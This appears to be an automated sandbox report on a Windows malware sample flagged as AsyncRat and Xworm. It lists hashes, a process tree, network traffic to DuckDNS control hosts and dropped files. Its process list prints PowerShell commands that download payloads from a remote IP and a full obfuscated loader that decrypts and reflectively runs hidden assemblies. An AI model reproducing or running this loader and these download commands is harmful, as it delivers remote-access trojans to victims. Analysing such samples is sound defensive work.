| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | fc1e372741f86ef61369556ba925bec0 |
| SHA1 | a82a7e51edcf14d237393045cf4e84f2abda0d21 |
| SHA256 | 2ce2b8dfd46b6b3a4bc293d9aff991671d7607229785bba248c9f00b006665fe |
| SHA512 | a4a24f30f334638d89128c600ca55c108bf670c20901647653bfc4b13e72d2b1bf0d7c3b7515152f1ddddede3a0b68e4f1f9eb42c9419f7c483b256684450bc7 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | deed430de95402f99f204a5089143f85 |
| SHA1 | 9831ba45b520e716b79ff64fdc6350613656ccde |
| SHA256 | c2f68eb7fccc7a04c566e2c5c9043cbe00ffacc30c616c708b205341d0189d38 |
| SHA512 | 08f6f08a04ccd3fefcf00679a74f1de96d9824d4bf112e8255448bb570e6807eba566397a40667d5e40a7d3197f32e89ea57761611f54844e6000225a8f205e3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a9dcc6c69f3efb5357db8843235fabf7 |
| SHA1 | 82ecf2da327e3fd534c92df9976b4e41c00553cc |
| SHA256 | cb74c952db2b01d27baafb7dd95ee7bfc739df42515a56f382f9601dfa0777cc |
| SHA512 | 46a539854d000d3566445665f1ab1b49d49c89169c16e10aab3b0c5291d5a6292b4408cc95f092be725d3ea016b57ea29f5817c4ab546c412640fdc5f0d2c547 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9db484d7470447755ef6e877e004c483 |
| SHA1 | 232ef8f4c91e3b4c7b5e5e1a1664ff6304b5493d |
| SHA256 | 45a2d9e2c3ea80b0c68b186e3493c2952a9cb2834a4f567a716ad00f72b1d8af |
| SHA512 | a1f85f219d52564a014ffa65004466234375bacff97dbd1d5dbe747221f8dd66492ddcbefac7dab427bdd766a89f0407ee2e7b52c0ca2493cb48f99d22742b0d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | b535a709dced7eaf9be112ba9005f02c |
| SHA1 | 168b930629bc3d2db8453fbe6c9a39ea8488858d |
| SHA256 | 60ca838cdd0e1128e667db9535c4c875a3e58b18d871eefe4595bf24d4bb8c54 |
| SHA512 | 1c5d992c12a7cc7aa392017ebdb6ab7ee450abdb52f1f63fb8963635900b2050fe87b1f4fd8098f408be5254bde9b80c2bab3afe7fb5e8ed0e427f6248f72837 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1647c14ba47572bd32e95637a65b71dd |
| SHA1 | 5033c6b616b2ad572f0bfd8a9e4aaca6b462ac84 |
| SHA256 | 5c112ee0d183d63b4123b7baaa0611799cb17ce8a1c4a0fcb888c1dedeb7d6ae |
| SHA512 | 3164660d48f81ce075bbd7f8fa30db8b0e77489a70bd8eda11fe654d1b4d06d45cba7ac23a4b7b4d70fc038ba6e51ac963f63632dd9353312b61278b114fdd03 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | e4a68ac854ac5242460afd72481b2a44 |
| SHA1 | df3c24f9bfd666761b268073fe06d1cc8d4f82a4 |
| SHA256 | cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f |
| SHA512 | 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ec11c9c0bfc619a33c65210f275856be |
| SHA1 | 5bea337933b77bb571e7e85c3f279bb668efaaab |
| SHA256 | d6184760bbb9a8b3dd884cb0d781c2f41c7bdee80f4d8d35972ea01a0cbb83df |
| SHA512 | ddc7adbcea76c18ba6471306e6a377f1d8c7657219c5271c9eadb5a9f042c398bf5778a31e05ed012a9fc17a64c5b088298a72eda129a8f3069c192b0d1880c6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5ed6146a82e139be6727f6b23350677a |
| SHA1 | ad0a86e2b6b593d60dfe936bc35b2a6bfdc20ae9 |
| SHA256 | 7e4c6eb1c8af57a2f6e80fbe938ae59daac261baef4d89a4b22c04cd66995876 |
| SHA512 | 6b0b905fb77c6598775a8686c582556646719ec486f16f87b925e3e40a77dad79a0d7111568da11ef222ba0cffd976c076ecdb25bf9a7f6be27a484ebab18053 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-03 10:59
Reported
2024-06-03 11:01
Platform
win10v2004-20240426-en
Max time kernel
137s
Max time network
150s
Command Line
Signatures
AsyncRat
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4396 created 3528 | N/A | C:\Users\Admin\Downloads\Python\Python312\python.exe | C:\Windows\Explorer.EXE |
| PID 5672 created 3528 | N/A | C:\Users\Admin\Downloads\Python\Python312\python.exe | C:\Windows\Explorer.EXE |
| PID 5140 created 3528 | N/A | C:\Users\Admin\Downloads\Python\Python312\python.exe | C:\Windows\Explorer.EXE |
Xworm
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Python\Python312\python.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Python\Python312\python.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Python\Python312\python.exe | N/A |
Loads dropped DLL
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Python\Python312\python.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Python\Python312\python.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Python\Python312\python.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\notepad.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\new.cmd"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gravity-finger-rp-sympathy.trycloudflare.com/VB.pdf
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb552146f8,0x7ffb55214708,0x7ffb55214718
C:\Windows\system32\timeout.exe
timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//DXJS.zip' -OutFile 'C:\Users\Admin\Downloads\DXJS.zip' }"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2648 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=5220 /prefetch:6
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5860 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5860 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5772 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\DXJS.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3004 /prefetch:2
C:\Users\Admin\Downloads\Python\Python312\python.exe
python.exe time.py
C:\Windows\System32\notepad.exe
C:\Windows\System32\notepad.exe
C:\Users\Admin\Downloads\Python\Python312\python.exe
python.exe kam.py
C:\Windows\System32\notepad.exe
C:\Windows\System32\notepad.exe
C:\Users\Admin\Downloads\Python\Python312\python.exe
python.exe update.py
C:\Windows\System32\notepad.exe
C:\Windows\System32\notepad.exe
C:\Users\Admin\Downloads\Python\Python312\python.exe
python.exe upload.py
C:\Windows\System32\notepad.exe
C:\Windows\System32\notepad.exe
C:\Users\Admin\Downloads\Python\Python312\python.exe
python.exe info.py
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gravity-finger-rp-sympathy.trycloudflare.com/VB.pdf
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb552146f8,0x7ffb55214708,0x7ffb55214718
C:\Windows\system32\timeout.exe
timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//startup.cmd' -OutFile 'C:\Users\Admin\Downloads\startup.cmd' }"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2007608289165396203,8246565359899541250,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//las.cmd' -OutFile 'C:\Users\Admin\Downloads\las.cmd' }"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mBikq5Vr6iXQSAx9AvNsTlJQx4QRAlMUymooTmEoTP8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9tB8qnL1HE5GeN2j8XvVTQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $osFJR=New-Object System.IO.MemoryStream(,$param_var); $TnAfO=New-Object System.IO.MemoryStream; $TmplX=New-Object System.IO.Compression.GZipStream($osFJR, [IO.Compression.CompressionMode]::Decompress); $TmplX.CopyTo($TnAfO); $TmplX.Dispose(); $osFJR.Dispose(); $TnAfO.Dispose(); $TnAfO.ToArray();}function execute_function($param_var,$param2_var){ $uDFqM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RXfqD=$uDFqM.EntryPoint; $RXfqD.Invoke($null, $param2_var);}$ktYZz = 'C:\Users\Admin\Downloads\las.cmd';$host.UI.RawUI.WindowTitle = $ktYZz;$VTjTb=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ktYZz).Split([Environment]::NewLine);foreach ($HurkY in $VTjTb) { if ($HurkY.StartsWith(':: ')) { $MHhXk=$HurkY.Substring(3); break; }}$payloads_var=[string[]]$MHhXk.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//xff.cmd' -OutFile 'C:\Users\Admin\Downloads\xff.cmd' }"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gravity-finger-rp-sympathy.trycloudflare.com | udp |
| US | 104.16.230.132:443 | gravity-finger-rp-sympathy.trycloudflare.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.230.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| GB | 57.128.129.21:8080 | 57.128.129.21 | tcp |
| NL | 23.63.101.153:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | 21.129.128.57.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.101.63.23.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| US | 52.165.165.26:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| IE | 20.166.126.56:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 52.165.165.26:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 52.165.165.26:443 | tcp | |
| US | 8.8.8.8:53 | 97.90.14.23.in-addr.arpa | udp |
| IE | 52.111.236.23:443 | tcp | |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xvern429.duckdns.org | udp |
| US | 12.202.180.134:8890 | xvern429.duckdns.org | tcp |
| GB | 57.128.129.21:8080 | 57.128.129.21 | tcp |
| GB | 57.128.129.21:8080 | 57.128.129.21 | tcp |
| US | 8.8.8.8:53 | 134.180.202.12.in-addr.arpa | udp |
| US | 8.8.8.8:53 | asyncss.duckdns.org | udp |
| US | 8.8.8.8:53 | nmds.duckdns.org | udp |
| US | 12.202.180.134:8895 | nmds.duckdns.org | tcp |
| US | 8.8.8.8:53 | xgmn934.duckdns.org | udp |
| US | 12.202.180.134:8896 | xgmn934.duckdns.org | tcp |
| GB | 57.128.129.21:8080 | 57.128.129.21 | tcp |
Files
memory/4924-1-0x00007FFB53CD3000-0x00007FFB53CD5000-memory.dmp
memory/4924-2-0x00000285C9060000-0x00000285C9082000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eegmkhk5.joe.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ecdc2754d7d2ae862272153aa9b9ca6e |
| SHA1 | c19bed1c6e1c998b9fa93298639ad7961339147d |
| SHA256 | a13d791473f836edcab0e93451ce7b7182efbbc54261b2b5644d319e047a00a7 |
| SHA512 | cd4fb81317d540f8b15f1495a381bb6f0f129b8923a7c06e4b5cf777d2625c30304aee6cc68aa20479e08d84e5030b43fbe93e479602400334dfdd7297f702f2 |
memory/4924-17-0x00007FFB53CD0000-0x00007FFB54791000-memory.dmp
memory/4924-18-0x00007FFB53CD0000-0x00007FFB54791000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 2daa93382bba07cbc40af372d30ec576 |
| SHA1 | c5e709dc3e2e4df2ff841fbde3e30170e7428a94 |
| SHA256 | 1826d2a57b1938c148bf212a47d947ed1bfb26cfc55868931f843ee438117f30 |
| SHA512 | 65635cb59c81548a9ef8fdb0942331e7f3cd0c30ce1d4dba48aed72dbb27b06511a55d2aeaadfadbbb4b7cb4b2e2772bbabba9603b3f7d9c8b9e4a7fbf3d6b6b |
\??\pipe\LOCAL\crashpad_2400_HZAPZRXYFGFZOWGS
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | a11f0b5572c84e597608fc3eccdcc453 |
| SHA1 | a19f63522bb2d71fde9ae8382877a0d6ecba8340 |
| SHA256 | 026f8c55f7d8c0e5aa433f6c9b6072796538317720b0f80884f5f69ca1865a74 |
| SHA512 | 285dcc548538fcbb70bd9c0b7a3c47e5c28c1a979a233be1f7db2f97880acfbb8b29c9d5d6b37b7b201ba81bc3c50f2ef2b95f8da52f774579220fcedfb138df |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 844e5d3c9824411bbcb29570f9a15ca5 |
| SHA1 | 77c95042b3d1a004653f3b2d44b996df4687a2f1 |
| SHA256 | 910224575655876a8aeeed9e78d73d8f7cc98298eeeaa1c394d658f5aab9b34c |
| SHA512 | dd517765719ab2832c0665a0631cf11736e032338a5a9e7b015d45327e9b104a5ec60d1e17da5bcc454c3a73e94cdc3091ae504f1e926c45aec988e7b6489d74 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b41b78bfefe2777d0927dbb2a1d60ea5 |
| SHA1 | c14ef2336e20b339f36b9cc196268ec0be507328 |
| SHA256 | f601b89d1bf516e6d10bbe59cc99381c0d020745b6713b9239aa6a1e4858a1fe |
